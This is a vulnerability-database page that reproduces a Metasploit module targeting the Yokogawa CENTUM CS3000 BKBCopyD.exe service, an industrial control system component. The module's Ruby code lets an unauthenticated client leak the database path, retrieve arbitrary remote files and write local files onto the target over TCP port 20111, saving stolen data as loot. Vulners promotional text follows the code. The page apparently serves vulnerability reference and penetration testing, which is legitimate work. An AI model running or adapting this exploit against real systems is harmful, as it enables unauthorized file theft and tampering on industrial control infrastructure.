Vulners
Lucene search
Yokogawa BKBCopyD.exe Client Exploit
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Yokogawa BKBCopyD.exe Client',
'Description' => %q{
This module allows an unauthenticated user to interact with the Yokogawa
CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR
operations.
},
'Author' =>
[ 'Unknown' ],
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access']
],
'Actions' =>
[
['PMODE', { 'Description' => 'Leak the current database' }],
['RETR', { 'Description' => 'Retrieve remote file' }],
['STOR', { 'Description' => 'Store remote file' }]
],
'DisclosureDate' => 'Aug 9 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(20111),
OptString.new('RPATH', [ false, 'The Remote Path (required to RETR and STOR)', "" ]),
OptPath.new('LPATH', [ false, 'The Local Path (required to STOR)' ])
], self.class)
end
def srvport
@srvport
end
def run
exploit
end
def exploit
@srvport = rand(1024..65535)
print_status("#{@srvport}")
# We make the client connection before giving control to the TCP Server
# in order to release the src port, so the server can start correctly
case action.name
when 'PMODE'
print_status("Sending PMODE packet...")
data = "PMODE MR_DBPATH\n"
res = send_pkt(data)
if res and res =~ /^210/
print_good("Success: #{res}")
else
print_error("Failed...")
end
return
when 'RETR'
data = "RETR #{datastore['RPATH']}\n"
print_status("Sending RETR packet...")
res = send_pkt(data)
return unless res and res =~ /^150/
when 'STOR'
data = "STOR #{datastore['RPATH']}\n"
print_status("Sending STOR packet...")
res = send_pkt(data)
return unless res and res =~ /^150/
else
print_error("Incorrect action")
return
end
super # TCPServer :)
end
def send_pkt(data)
connect(true, {'CPORT' => @srvport})
sock.put(data)
data = sock.get_once
disconnect
return data
end
def valid_response?(data)
return false unless !!data
return false unless data =~ /500 'yyparse error': command not understood/
return true
end
def on_client_connect(c)
if action.name == 'STOR'
contents = ""
File.new(datastore['LPATH'], "rb") { |f| contents = f.read }
print_status("#{c.peerhost} - Sending data...")
c.put(contents)
self.service.close
self.service.stop
end
end
def on_client_data(c)
print_status("#{c.peerhost} - Getting data...")
data = c.get_once
return unless data
if @store_path.blank?
@store_path = store_loot("yokogawa.cs3000.file", "application/octet-stream", rhost, data, datastore['PATH'])
print_good("#{@store_path} saved!")
else
File.open(@store_path, "ab") { |f| f.write(data) }
print_good("More data on #{@store_path}")
end
end
def on_client_close(c)
stop_service
end
end
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2014 00:00Current
7.3High risk
Vulners AI Score7.3